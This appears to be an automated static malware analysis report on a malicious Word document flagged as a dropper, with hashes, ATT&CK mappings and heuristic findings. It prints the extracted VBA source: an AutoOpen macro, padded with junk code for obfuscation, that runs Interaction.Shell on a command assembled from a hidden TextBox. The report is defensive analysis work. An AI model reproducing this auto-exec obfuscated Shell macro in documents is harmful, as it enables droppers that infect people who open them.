Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 08e5ddf49bd7033c…

MALICIOUS

Office (OLE)

Size: 136.5 KB
Created: 2018-12-20 19:45:00
Authoring application: Microsoft Office Word
First seen: 2019-11-20
MD5: 72ca7da1f84664dcf39dd58fa3532f79
SHA-1: 821e512e7bf0f5029604f85a735d409944dd43eb
SHA-256: 08e5ddf49bd7033c1bdf0b422a3c510293f6c2bd68bac7aaf9656f1421253295
Risk Score: 250

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro. The macro calls the Shell() function to execute commands, which fires a critical heuristic. This strongly suggests the document's purpose is to download and execute a secondary payload, behaviour characteristic of a dropper. The ClamAV signature also identifies it as a dropper.

Heuristics (8)

  • ClamAV: Doc.Dropper.Valyria-6791452-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Valyria-6791452-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script (with surrounding context):
          End Select
    i806603 = Array(Y90371, X13322673, w201271, Interaction.Shell(CVar("" + j299603 + I2117368 + B5424389 + Q30711310 + n7550609.TextBox1) + R32472235 + l64504798, 33 - 33), X9218589)
       Select Case V30365866289412
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script (with surrounding context):
    Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
    Sub autoopen()
    l7566742
  • Suspicious cmd.exe invocation with execution flag [high] SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5152 bytes
SHA-256: 24f6c94b8bc0f6356bcec6f33e8de7e5f2bfd9e3645741ae22d2f1c683dc4be4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "n7550609"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
l7566742
End Sub

Attribute VB_Name = "t6272028496"
Function l7566742()
On Error Resume Next
   Select Case o3235378367683029487816
         Case 186403266
         Z265 = P741
            T510 = CInt(B789 / CByte(w254))
            P853 = l771
         Case 319526207
         F413 = L7367
         Y5713 = a3473
           w6221 = CInt(j900 / CByte(v487))
         Case 18153305
         b3886 = z705
         E965 = S1791
      End Select
   Select Case a1308167890389162865
         Case 210956575
         z7277 = h9277
            W470 = CInt(i236 / CByte(D579))
            q009 = v717
         Case 287634055
         Z919 = P6758
         K7944 = w680
           k9939 = CInt(M831 / CByte(z243))
         Case 213555218
         n915 = w830
         c3212 = n231
      End Select
   Select Case j405647239193822752
         Case 75797785
         c8467 = O1789
            z6775 = CInt(S1674 / CByte(f1134))
            r1092 = d0954
         Case 47057437
         F2232 = X378
         w057 = h9178
           m9252 = CInt(c097 / CByte(A365))
         Case 258971463
         q0723 = u3100
         j469 = X428
      End Select
i806603 = Array(Y90371, X13322673, w201271, Interaction.Shell(CVar("" + j299603 + I2117368 + B5424389 + Q30711310 + n7550609.TextBox1) + R32472235 + l64504798, 33 - 33), X9218589)
   Select Case V30365866289412
         Case 163737109
         K552 = D610
            z011 = CInt(c4204 / CByte(z3620))
            b0914 = Q0959
         Case 100188767
         X362 = c5204
         v2243 = v123
           C2364 = CInt(E1159 / CByte(r8418))
         Case 207320144
         m770 = J508
         i9215 = Y022
      End Select
   Select Case z768948010960087
         Case 318931518
         w8056 = B2323
            f3938 = CInt(I777 / CByte(F4989))
            b8597 = C3620
         Case 254641196
         I7834 = o7285
         A399 = j927
           V8903 = CInt(C3930 / CByte(a3515))
         Case 41865452
         t401 = f7354
         F615 = w554
      End Select
   Select Case w516262177896811
         Case 149478606
         R8545 = k642
            w8488 = CInt(H0152 / CByte(z941))
            q5289 = z2871
         Case 291916872
         i2048 = W1829
         U537 = X1208
           B0214 = CInt(A1223 / CByte(z2624))
         Case 199399231
         B4385 = n632
         k9930 = h915
      End Select
End Function


Attribute VB_Name = "v34186423828458"

Attribute VB_Name = "h6794249115"

Attribute VB_Name = "m1351836"

Attribute VB_Name = "C334442823186"

Attribute VB_Name = "a2128506"

Attribute VB_Name = "X94019886"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "m06034411"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "V673523271"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "u352230845"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "C6936320725"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "p476502477"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "I2918013329316"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False